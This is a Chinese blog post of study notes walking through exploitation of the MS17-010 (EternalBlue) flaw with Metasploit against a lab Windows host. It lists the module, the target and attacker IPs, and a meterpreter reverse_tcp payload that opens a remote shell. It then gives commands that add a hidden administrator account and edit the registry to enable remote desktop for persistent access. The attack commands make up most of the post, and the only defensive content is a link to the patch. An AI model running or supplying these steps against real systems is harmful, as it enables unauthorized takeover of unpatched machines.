利用msf的ms17_010模块提权

学习笔记 无标签 2018-05-15 阅读:4922

其实啊,这个东西没什么用

先参考下,更新补丁下载更新吧,几乎在座各位用的系统都有影响。(没补丁前)    https://docs.microsoft.com/zh-cn/security-updates/Securitybulletins/2017/ms17-010

先启动msf

msfconsole
search ms17_010
use exploit/windows/smb/ms17_010_eternalblue //使用模块
show options //查看必要参数

1.PNG

set RHOST 192.168.1.100
set LHOST 192.168.1.132 //攻击机ip
set payload windows/x64/meterpreter/reverse_tcp //使用这个东西
run

2.PNG

5.PNG

cmd添加用户(不知道什么意思可以百度)

net user abc qwe+123 /add
net localgroup administrators abc /add

6.PNG

7.PNG

cmd写入注册表开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

8.PNG

接下来用刚刚创建的用户远程连接靶机

10.PNG

11.PNG

12.PNG

本文参考:

https://zhidao.baidu.com/question/128762189.html



kail除了msf还有很多工具,有兴趣自己了解。。。。推荐书本《Metasploit渗透测试魔鬼训练营》

生成海报
版权声明

本文基于《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
文章链接:https://www.fxnetw.com/17.html (转载时请注明本文出处及文章链接)


如果觉得我的文章对你有用,请随意赞赏

0条评论